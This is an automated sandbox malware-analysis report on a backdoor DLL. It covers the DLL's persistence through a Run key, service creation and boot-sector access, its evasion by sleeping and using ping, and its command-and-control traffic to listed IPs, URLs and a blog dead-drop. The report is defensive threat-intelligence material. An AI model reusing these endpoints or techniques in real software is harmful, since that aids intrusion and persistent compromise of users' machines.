Source: Binary string: c:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.**.* source: rundll32.exe, 00000003.00000003.3709951057.0000000002B4B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3709925498.0000000002B33000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\c:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.*\*.*g source: rundll32.exe, 00000003.00000003.1849601371.0000000002B29000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1849653083.0000000002B33000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.**tate\*.*.*H{ source: rundll32.exe, 00000003.00000003.2132721514.0000000002B25000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2134419805.0000000002B31000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\c:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.*.*m source: rundll32.exe, 00000003.00000003.2413353729.0000000002B37000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2413606315.0000000002B3F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.** source: rundll32.exe, 00000003.00000003.2533457815.0000000002B34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2533805373.0000000002B34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2293300146.0000000002B34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2332381587.0000000002B34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2413695167.0000000002B34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2332599254.0000000002B34000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\c:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\*.**: source: rundll32.exe, 00000003.00000003.2533864222.0000000002B41000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2533457815.0000000002B34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2533805373.0000000002B34000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_10005870 Sleep,LoadLibraryA,GetProcAddress,GetExtendedUdpTable,Sleep,malloc,GetExtendedUdpTable,htons,free,FreeLibrary, 3_2_10005870
Source: initial sample | Static PE information: section where entry point is pointing to: fdss
Source: NaRZIOq3O8.dll | Static PE information: section name: fdss
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_1002303D pushfd ; mov dword ptr [esp], edi 3_2_1002305D
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_100099FC push eax; mov dword ptr [esp], 2B3AF999h 3_2_10009A23
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_10009A49 push dword ptr [esp+14h]; retn 0018h 3_2_10009A58
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_10021AD0 push 3268CA87h; mov dword ptr [esp], ebx 3_2_10021ADA
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_100212FC pushfd ; mov dword ptr [esp], ecx 3_2_10022E4D
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_100212FC pushfd ; mov dword ptr [esp], edi 3_2_10022E51
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_10009C3B push dword ptr [esp+2Ch]; retn 0030h 3_2_10009C4E
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_100224AA pushfd ; mov dword ptr [esp], esi 3_2_100224C6
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_10021CF9 push B3A48B18h; mov dword ptr [esp], 1D42FA0Eh 3_2_1002213E
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_10021D30 push B3A48B18h; mov dword ptr [esp], 1D42FA0Eh 3_2_1002213E
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_10021D35 push B3A48B18h; mov dword ptr [esp], 1D42FA0Eh 3_2_1002213E
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_10021D61 push dword ptr [esp+30h]; retn 0034h 3_2_10021D6F
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_100225B0 pushfd ; mov dword ptr [esp], edi 3_2_100225B5
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_10021DD6 pushad ; mov dword ptr [esp], 4428EA9Bh 3_2_10021E1E
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_1002271A push dword ptr [esp+0Ch]; retn 0010h 3_2_10022724
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_10021F36 pushfd ; mov dword ptr [esp], ecx 3_2_10022E4D
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_10021F36 pushfd ; mov dword ptr [esp], edi 3_2_10022E51
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_10009760 push eax; mov dword ptr [esp], 6C7BBFF6h 3_2_1002979B
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_10009760 pushfd ; mov dword ptr [esp], CC5FD643h 3_2_1002A954
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_10010FA0 push eax; ret 3_2_10010FCE
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_10022FC1 push D32B6479h; mov dword ptr [esp], ebx 3_2_10022FC6
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_10022FC1 pushfd ; mov dword ptr [esp], esi 3_2_10022FCA
Source: initial sample | Static PE information: section name: UPX0
Source: initial sample | Static PE information: section name: UPX1

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\rundll32.exe | Code function: sprintf,CreateFileA,DeviceIoControl,GetLastError,FormatMessageA,CloseHandle,wsprintfA, \\.\PHYSICALDRIVE%d 3_2_1000C190

Boot Survival

Source: C:\Windows\SysWOW64\rundll32.exe | Code function: sprintf,CreateFileA,DeviceIoControl,GetLastError,FormatMessageA,CloseHandle,wsprintfA, \\.\PHYSICALDRIVE%d 3_2_1000C190
Source: C:\Windows\SysWOW64\rundll32.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Vicity
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_10008880 wsprintfA,rand,OpenSCManagerA,CreateServiceA,GetLastError,OpenServiceA,StartServiceA,wsprintfA,wsprintfA,RegOpenKeyA,lstrlen,RegSetValueExA,wsprintfA,RegCreateKeyA,_CxxThrowException,RegSetValueExA,SetLastError,_CxxThrowException,RegCloseKey,RegOpenKeyExA,_CxxThrowException,RegSetValueExA,SetLastError,_CxxThrowException,GetLastError,RegCloseKey,RegCloseKey, 3_2_10008880
Source: C:\Windows\System32\loaddll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\SysWOW64\rundll32.exe | Evasive API call chain: CreateMutex,DecisionNodes,Sleep graph_3-6186
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_10022EE7 rdtsc 3_2_10022EE7
Source: C:\Windows\SysWOW64\rundll32.exe | Thread delayed: delay time: 600000
Source: C:\Windows\SysWOW64\rundll32.exe | Thread delayed: delay time: 300000
Source: C:\Windows\SysWOW64\rundll32.exe | Thread delayed: delay time: 180000
Source: C:\Windows\SysWOW64\rundll32.exe | Thread delayed: delay time: 3600000
Source: C:\Windows\SysWOW64\rundll32.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\rundll32.exe | Window / User API: threadDelayed 3765
Source: C:\Windows\SysWOW64\rundll32.exe | Window / User API: threadDelayed 6007
Source: C:\Windows\SysWOW64\rundll32.exe | Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) graph_3-6872
Source: C:\Windows\SysWOW64\rundll32.exe | Evasive API call chain: RegOpenKey,DecisionNodes,Sleep graph_3-6264
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5916 | Thread sleep count: 32 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7336 | Thread sleep time: -600000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7336 | Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 1424 | Thread sleep count: 3765 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 1424 | Thread sleep time: -1129500000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7412 | Thread sleep time: -3000000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7736 | Thread sleep time: -720000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7480 | Thread sleep time: -600000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7332 | Thread sleep time: -1200000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 3192 | Thread sleep time: -7200000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 1424 | Thread sleep count: 6007 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 1424 | Thread sleep time: -1802100000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7336 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXE | Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_1000B3C0 lstrcpy,lstrcat,lstrcat,lstrcat,FindFirstFileA,FindNextFileA,lstrcpy,lstrcat,lstrcat,_strcmpi,PathIsDirectoryA,6D262DD0,strchr,strchr,strchr,strchr,atoi,CreateDirectoryA,Sleep,lstrcat,FindNextFileA,FindClose, 3_2_1000B3C0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_10005A50 FindFirstFileA,wsprintfA,FindNextFileA,FindClose, 3_2_10005A50
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_100068C0 6D262DD0,6D262DD0,6D262DD0,strrchr,strncpy,strncpy,strncpy,GetSystemInfo,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,sscanf, 3_2_100068C0
Source: C:\Windows\System32\loaddll32.exe | Thread delayed: delay time: 120000
Source: C:\Windows\SysWOW64\rundll32.exe | Thread delayed: delay time: 60000
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\
Source: rundll32.exe, 00000003.00000002.3755382299.00000000027CB000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: s\Applications\\VMwareHo
Source: rundll32.exe, 00000003.00000002.3755445264.0000000002ABB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.3755445264.0000000002A6F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: rundll32.exe, 00000003.00000002.3768559853.00000000051E0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runsses\Applications\\VMwareHostOpen.exe\Internet Settings\Lockdown_Zones\4_Zones\0x
Source: rundll32.exe, 00000003.00000002.3755445264.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWA
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_10005870 Sleep,LoadLibraryA,GetProcAddress,GetExtendedUdpTable,Sleep,malloc,GetExtendedUdpTable,htons,free,FreeLibrary, 3_2_10005870

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 202.108.0.52 80
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 107.163.241.186 12354
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 107.163.241.185 16300
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 107.163.241.193 6520
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\NaRZIOq3O8.dll",#1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\rundll32.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_10010050 GetLocalTime,SystemTimeToFileTime, 3_2_10010050
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_10007420 CreateThread,Sleep,GetVersionExA,Sleep,sprintf, 3_2_10007420

Stealing of Sensitive Information

Source: C:\Windows\SysWOW64\rundll32.exe | Device IO: \Device\Harddisk0\DR0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_10005E10 WSAStartup,socket,socket,socket,htons,htons,inet_addr,inet_addr,htons,inet_addr,bind,ioctlsocket,select,WSAGetLastError,Sleep,recvfrom,wsprintfA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,malloc,htons,htons,htons,htons,htons,htons,htonl,htons,inet_addr,sendto,closesocket,closesocket,closesocket,WSACleanup, 3_2_10005E10
MITRE ATT&CK Matrix (techniques listed per tactic column; the numeric prefixes are the signature-count badges as shown in the report)

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies, Network Topology, IP Addresses
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless, Malvertising, Compromise Infrastructure
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application, Supply Chain Compromise
Execution: 11 Native API, 2 Service Execution, At, Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job, Command and Scripting Interpreter, PowerShell
Persistence: 1 DLL Side-Loading, 2 Windows Service, 11 Registry Run Keys / Startup Folder, 1 Bootkit, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job, At, Cron
Privilege Escalation: 1 DLL Side-Loading, 1 Access Token Manipulation, 2 Windows Service, 111 Process Injection, 11 Registry Run Keys / Startup Folder, RC Scripts, Startup Items, Scheduled Task/Job, At, Cron
Defense Evasion: 1 Deobfuscate/Decode Files or Information, 21 Obfuscated Files or Information, 1 Software Packing, 1 DLL Side-Loading, 1 Masquerading, 21 Virtualization/Sandbox Evasion, 1 Access Token Manipulation, 111 Process Injection, 1 Bootkit, 1 Rundll32
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow, Network Sniffing
Discovery: 1 System Time Discovery, 2 File and Directory Discovery, 114 System Information Discovery, 11 Security Software Discovery, 21 Virtualization/Sandbox Evasion, 1 Process Discovery, 1 Application Window Discovery, 1 Remote System Discovery, 1 System Network Configuration Discovery, Network Service Discovery
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services, Direct Cloud VM Connections, Shared Webroot
Collection: 1 Archive Collected Data, Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged, Local Data Staging
Command and Control: 1 Ingress Tool Transfer, 1 Encrypted Channel, 1 Non-Standard Port, 1 Non-Application Layer Protocol, 1 Application Layer Protocol, Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols, File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol, Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: 1 System Shutdown/Reboot, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement, Internal Defacement, External Defacement
Behavior Graph (ID 1558496, sample NaRZIOq3O8.dll, start date 19/11/2024, architecture WINDOWS, score 100)
Domains contacted: blogx.sina.com.cn, blog.sina.com.cn
Top-level signatures: Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; 3 other signatures
Process tree:
  loaddll32.exe
    rundll32.exe (connects to 107.163.241.185:16300 TAKE2US United States, 107.163.241.186:12354 TAKE2US United States, 2 other IPs or domains; System process connects to network (likely due to code injection or exploit); Found evasive API chain (may stop execution after checking mutex); Contains functionality to infect the boot sector; Creates an autostart registry key pointing to binary in C:\Windows)
    cmd.exe (Uses ping.exe to sleep; Uses ping.exe to check the status of other devices and networks)
      rundll32.exe (Queries disk data (e.g. SMART data))
        cmd.exe (Uses ping.exe to sleep)
          PING.EXE (127.0.0.1)
          conhost.exe
    rundll32.exe (Queries disk data (e.g. SMART data))
      cmd.exe (Uses ping.exe to sleep)
        conhost.exe
        PING.EXE
    conhost.exe
  rundll32.exe
    cmd.exe
      conhost.exe
      PING.EXE
  rundll32.exe
    cmd.exe
      conhost.exe
      PING.EXE

| Source | Detection | Scanner | Label | Link |
| --- | --- | --- | --- | --- |
| NaRZIOq3O8.dll | 89% | ReversingLabs | Win32.Backdoor.Venik | |
| NaRZIOq3O8.dll | 100% | Avira | TR/Patched.Ren.Gen | |
| NaRZIOq3O8.dll | 100% | Joe Sandbox ML | | |
No Antivirus matches
No Antivirus matches
No Antivirus matches
| Source | Detection | Scanner | Label | Link |
| --- | --- | --- | --- | --- |
| http://107.163.241.186:12354/login.php; | 0% | Avira URL Cloud | safe | |
| http://107.163.241.186:12354/login.phpU)U | 0% | Avira URL Cloud | safe | |
| http://107.163.241.186:12354/login.phpData | 0% | Avira URL Cloud | safe | |
| http://107.163.241.185:16300/ | 0% | Avira URL Cloud | safe | |
| http://107.163.241.186:12354/login.php_kt | 0% | Avira URL Cloud | safe | |
| http://107.163.241.186:12354/login.phpykV | 0% | Avira URL Cloud | safe | |
| http://107.163.241.186:12354/login.phpogs | 0% | Avira URL Cloud | safe | |
| http://107.163.241.186:12354/login.php#)o | 0% | Avira URL Cloud | safe | |
| http://107.163.241.186:12354/login.phpwk | 0% | Avira URL Cloud | safe | |
| http://107.163.241.186:12354/login.php) | 0% | Avira URL Cloud | safe | |
| http://107.163.241.186:12354/login.php()b | 0% | Avira URL Cloud | safe | |
| http://107.163.241.186:12354/login.phpB)H | 0% | Avira URL Cloud | safe | |
| http://107.163.24I | 0% | Avira URL Cloud | safe | |
| http://www.rsac.org/ratingsv01.html | 0% | Avira URL Cloud | safe | |
| http://107.163.241.186:12354/login.phpSk | 0% | Avira URL Cloud | safe | |
| http://107.163.241.185:16300//joy.asp?sid=rungnejcndvgnJLfFe5vteX8v2LUicbtudb8mteXmJe1nde | 0% | Avira URL Cloud | safe | |
| http://107.163.241.186:12354/login.phpckP | 0% | Avira URL Cloud | safe | |
| http://107.163.241.186:12354/login.phpMkb | 0% | Avira URL Cloud | safe | |
| http://107.163.241.186:12354/login.phpbV | 0% | Avira URL Cloud | safe | |
| http://107.163.241.186:12354/login.phpAkn | 0% | Avira URL Cloud | safe | |
| http://107.163.241.186:12354/login.php | 0% | Avira URL Cloud | safe | |
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
| --- | --- | --- | --- | --- | --- |
| blogx.sina.com.cn | 202.108.0.52 | true | false | | high |
| blog.sina.com.cn | unknown | unknown | false | | high |
| Name | Source | Malicious | Antivirus Detection | Reputation |
| --- | --- | --- | --- | --- |
| http://blog.sina.com.cn/u/5655029807OW64 | rundll32.exe, 00000003.00000003.3057253768.0000000002B04000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| http://107.163.241.186:12354/login.php; | rundll32.exe, 00000003.00000002.3769274572.000000000584A000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.3755445264.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://107.163.241.185:16300/ | rundll32.exe, rundll32.exe, 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: safe | unknown |
| http://107.163.241.186:12354/login.phpogs | rundll32.exe, 00000003.00000002.3755445264.0000000002A6F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://107.163.241.186:12354/login.phpU)U | rundll32.exe, 00000003.00000002.3755445264.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://107.163.241.186:12354/login.phpData | rundll32.exe, 00000003.00000002.3755445264.0000000002A6F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://blog.sina.com.cn/u/5655029807pSk | rundll32.exe, 00000003.00000003.3057253768.0000000002B04000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| http://107.163.241.186:12354/login.php_kt | rundll32.exe, 00000003.00000003.3057253768.0000000002B04000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://blog.sina.com.cn/u/5655029807. | rundll32.exe, 00000003.00000002.3769344739.000000000597D000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.3755445264.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| http://107.163.241.186:12354/login.php#)o | rundll32.exe, 00000003.00000002.3755445264.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://107.163.241.186:12354/login.phpykV | rundll32.exe, 00000003.00000002.3755445264.0000000002B04000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://blog.sina.com.cn/u/%s | rundll32.exe, rundll32.exe, 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp | false | | high |
| http://107.163.241.186:12354/login.php) | rundll32.exe, 00000003.00000002.3769043111.000000000562D000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.3768985716.00000000055AD000.00000004.00000010.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://107.163.241.186:12354/login.phpwk | rundll32.exe, 00000003.00000002.3755445264.0000000002B04000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://107.163.241.186:12354/login.php()b | rundll32.exe, 00000003.00000002.3755445264.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://107.163.241.186:12354/login.phpB)H | rundll32.exe, 00000003.00000002.3755445264.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://www.rsac.org/ratingsv01.html | rundll32.exe, 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmp, NaRZIOq3O8.dll | false | Avira URL Cloud: safe | unknown |
| http://107.163.241.185:16300//joy.asp?sid=rungnejcndvgnJLfFe5vteX8v2LUicbtudb8mteXmJe1nde | rundll32.exe, 00000003.00000002.3755445264.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://blog.sina.com.cn/u/%sXGRyaXZlcnNcZXRjXGhvc3RzLmljcw==XGRyaXZlcnNcZXRjXGhvc3Rz | rundll32.exe, 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp | false | | high |
| http://blog.sina.com.cn/u/5655029807 | rundll32.exe, 00000003.00000002.3755445264.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| http://blog.sina.com.cn/u/5655029807p | rundll32.exe, 00000003.00000002.3755445264.0000000002B04000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3057253768.0000000002B04000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| http://107.163.241.186:12354/login.phpSk | rundll32.exe, 00000003.00000002.3755445264.0000000002B04000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://107.163.24I | rundll32.exe, 00000003.00000002.3768985716.00000000055AD000.00000004.00000010.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://blog.sina.com.cn/u/5655029807osoft | rundll32.exe, 00000003.00000002.3755445264.0000000002B04000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| http://107.163.241.186:12354/login.phpckP | rundll32.exe, 00000003.00000002.3755445264.0000000002B04000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3057253768.0000000002B04000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://107.163.241.186:12354/login.phpAkn | rundll32.exe, 00000003.00000002.3755445264.0000000002B04000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3057253768.0000000002B04000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://107.163.241.186:12354/login.phpMkb | rundll32.exe, 00000003.00000003.3057253768.0000000002B04000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://107.163.241.186:12354/login.phpbV | rundll32.exe, 00000003.00000002.3755445264.0000000002B04000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://107.163.241.186:12354/login.php | rundll32.exe, 00000003.00000002.3755445264.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: safe | unknown |
| IP | Domain | Country | ASN | ASN Name | Malicious |
| --- | --- | --- | --- | --- | --- |
| 202.108.0.52 | blogx.sina.com.cn | China | 4808 | CHINA169-BJChinaUnicomBeijingProvinceNetworkCN | false |
| 107.163.241.186 | unknown | United States | 20248 | TAKE2US | true |
| 107.163.241.185 | unknown | United States | 20248 | TAKE2US | true |
| 107.163.241.193 | unknown | United States | 20248 | TAKE2US | true |
                      IP
                      127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1558496
Start date and time: 2024-11-19 14:22:13 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 7s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 26
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: NaRZIOq3O8.dll (renamed because the original name is a hash value)
Original Sample Name: e999daea87b481d11b4fd8559bdd3d68516dc0ef.dll
Detection: MAL
Classification: mal100.troj.spyw.evad.winDLL@31/1@5/5
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 43
• Number of non-executed functions: 43
Cookbook Comments:
• Found application associated with file extension: .dll
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
